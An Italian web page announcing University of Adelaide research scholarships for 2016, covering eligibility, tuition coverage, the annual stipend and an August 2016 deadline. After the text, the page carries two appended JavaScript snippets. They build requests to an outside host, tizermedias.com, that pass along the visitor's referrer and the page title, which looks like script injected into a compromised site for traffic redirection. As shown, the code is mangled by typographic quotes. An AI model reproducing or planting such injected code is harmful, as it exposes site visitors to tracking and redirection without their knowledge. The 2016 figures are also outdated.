Borse di studio e ricerca Adelaide 2016

L’università di Adelaide offre borse di studio rivolte a studenti universitari e ricercatori per continuare gli studi in Australia.

A chi sono rivolte

Le borse di studio e ricerca Adelaide 2016 sono rivolte a laureati e ricercatori che siano già in possesso di un titolo di studio universitario e abbiano un’ottima conoscenza della lingua inglese.

L’importo e la durata

Le borse di studio e ricerca Adelaide 2016 prevedono copertura delle tasse universitarie per due anni per un master da ricercatore e per tre anni per un dottorato di ricerca più assegno vitalizio annuo da 26.288 dollari nel 2016 per due anni per il master da ricercatore e tre anni per un dottorato di ricerca.

I requisiti

Per candidarsi alle borse di studio e ricerca Adelaide 2016 bisogna essere in possesso dei seguenti requisiti:

  • aver conseguito una laurea triennale o magistrale presso un’università internazionale;
  • ottima conoscenza della lingua inglese.

Come e quando presentare domanda

Per candidarsi alle borse di studio e ricerca Adelaide 2016 bisogna candidarsi attraverso il modulo online disponibile sul sito web ufficiale dell’università di Adelaide. La scadenza per l’invio delle candidature è fissata al 31 agosto 2016.

Bando borse di studio e ricerca Adelaide 2016(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();